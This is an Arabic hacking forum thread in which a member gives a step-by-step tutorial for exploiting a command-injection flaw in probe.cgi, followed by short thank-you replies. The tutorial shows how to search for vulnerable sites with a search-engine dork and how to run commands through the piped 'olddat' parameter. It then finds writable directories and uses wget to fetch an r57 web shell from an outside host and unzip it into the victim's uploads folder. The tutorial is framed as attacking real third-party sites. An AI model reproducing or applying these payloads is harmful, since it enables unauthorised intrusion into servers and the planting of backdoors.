التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-10-2008, 03:37 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





Super CristaL غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Super CristaL is on a distinguished road

.................... فن التعامل مع ثغرات Remote command exucetion


السلام عليكم ورحمة الله

راح نشرح عمل نوع من الثغرات وهي ما تسمى

(( Remote command exucetion ))

وهي تسمح لك برفع شل او باكدور ,,,,,,الخ

اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,

طيب خلينا نجيب ثغره ونطبق عنونها كذا

Probe.cgi Remote command Execution

يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت

---------------------------------------------------------
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product
....... probe.cgi
Type
.......... Remote command Execution

o Info
:
================
That '''''''''''' is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..

(
24) At this line, the cgi param 'olddat' is associated to one database.
This variable isnt checked by anyone matching, so you can open
all file that you want
. (35) At this line the '''''''''''' open the file
that you had chosen
. With pipe `|`
is possible to execute arbitrary code on the ''''''''l.


o Proof of concept:
================

http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)
--------------------------------------------------------------
لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار

استثمارها هنا بالسطر

كود:
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

cgi-bin<<===مجلد السيقيبين

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============

طيب نبغى نعرف كيف عملها اوكي

اول تسوي بحث بالطريقه هذي

allinurl:probe.cgi

او اي طريقة تحب

لنفرض اننا حصل موقع

WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid

كويس اول حاجه نضع

كود:
|id|
بيطلع بالشكل

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|id|

واعطيه انتر بيظهر لك مثلا كذا

كود:
uid=99(www) gid=99(www)
هذا صفتك بالسيرفر

طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي

كود:
pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|
بيطلع معك مثلا

كود:
/home/.???/cgi.bin

طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟

ضع مكان الاي دي

كود:
which wget
بالشكل,,,,,,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|
اذا ضهر لك كدا

كود:
/؟؟؟/؟؟؟/wget
وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل

يعني مسموح لك ترفع ملف انبسط ياعم

طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

لو ترجع احنا قلنا مكاننا وين هنا

كود:
/home/.???/cgi.bin
طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو

نضع مكان الاي دي
كود:
cd /home/.???/;pwd
يعني بيكون بالشكل

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|
الان بيرجعنا الى

كود:
home/.???/
حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر

كود:
;ls%20-al
بيطلع كذا,,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|
بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم

انت ابحث عن الملجلد اللي له التصريح

كود:
drwxrwxrwx
لنفرض انك حصلت امام مجلد الصور او uploads

اولا لازم نخش عليه تعمل

كود:
home/.???/uploads/;pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|
حلو بيكون وضعك بالشكل

كود:
home/.???/uploads/
يعني داخل مجلد uploads

الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك

كود:
www.XXX.com/r57''''''''l.zip
وتبغى ترفعه على الموقع المخترقه بالشكل,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*|
واعطيه انتر بيظهر لك

كود:
r57''''''''l.zip
طيب نبغى نفك الضغط عنه بالامر unzip

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*|
وديلو انتر بيطلع معك

كود:
r57''''''''l.php
والف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط

WWW.???.com/uploads/r57''''''''l.php

عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه

والى اللقاء

أخوكم super cristal








tk hgjuhlg lu eyvhj Remote command exucetion


التعديل الأخير تم بواسطة Super CristaL ; 03-10-2008 الساعة 03:41 PM.

   

رد مع اقتباس
قديم 03-10-2008, 08:54 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Crazy Dz
 

 

 
إحصائية العضو







Crazy Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Crazy Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Crazy Dz is on a distinguished road

افتراضي


شكرا علي المعلومات

التوقيع

http://im9.gulfup.com/2011-09-14/1316009561971.jpg

 

   

رد مع اقتباس
قديم 03-10-2008, 10:52 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية IzRi-InO
 

 

 
إحصائية العضو






IzRi-InO غير متواجد حالياً

إرسال رسالة عبر MSN إلى IzRi-InO إرسال رسالة عبر Yahoo إلى IzRi-InO

 

 

إحصائية الترشيح

عدد النقاط : 10
IzRi-InO is on a distinguished road

افتراضي


مشكور على ثغرة و شرح الجميل الى الامام اخي

التوقيع


ya yazrino inayi mani thodhid athwadad di thmath anach mani thadejid
sa9sigh khak imazewora ozogh khak ra inagora

thandarichak athmazikhet atonchak iwasora
azwigh khak irazeran ka3dar khag idhorar arif athbaderad khas
wacheya39ir ramdhawar
atrajid achak asfa9an sakidas anach azirar
akhak aksan ade9ar ichak yazin ra thafa
IzRi-InO

 

   

رد مع اقتباس
قديم 03-12-2008, 04:14 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو





قاهر كل من تحداه غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
قاهر كل من تحداه is on a distinguished road

افتراضي


مشكووووووووووووووووووووووور حبيبي

التوقيع

[CENTER]المدني بالحبال , والجندي بالرصاص والتهكير للعباقرة[/CENTER]

 

   

رد مع اقتباس
قديم 03-12-2008, 04:14 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو





قاهر كل من تحداه غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
قاهر كل من تحداه is on a distinguished road

افتراضي


ان شاء الله نستفيد من معلوماتك القيمة وتقبل مروري
تحياتي

التوقيع

[CENTER]المدني بالحبال , والجندي بالرصاص والتهكير للعباقرة[/CENTER]

 

   

رد مع اقتباس
قديم 05-28-2008, 08:38 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية SkRtaR
 

 

 
إحصائية العضو





SkRtaR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
SkRtaR is on a distinguished road

افتراضي


100%

100%

تحياتي

   

رد مع اقتباس
قديم 06-30-2008, 10:21 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو





phantom101010 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
phantom101010 is on a distinguished road

افتراضي


   

رد مع اقتباس
قديم 07-04-2008, 01:37 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية WoLF 305
 

 

 
إحصائية العضو





WoLF 305 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
WoLF 305 is on a distinguished road

افتراضي


يعطيك الف عافية

   

رد مع اقتباس
قديم 11-11-2009, 06:00 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو





Dr.BiLLi-HaCkEr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.BiLLi-HaCkEr is on a distinguished road

افتراضي


مشكور على المعلومة القيمة

   

رد مع اقتباس
قديم 11-11-2009, 08:03 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 

 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road

افتراضي


يعطيك العافية بانتظار جديدك

التوقيع

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كيف استغلال ثغرات Remote Exploits Local Exploits BL_TI جـــ'ابات العناكــ'ب 0 11-06-2010 04:16 PM


الساعة الآن 04:41 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0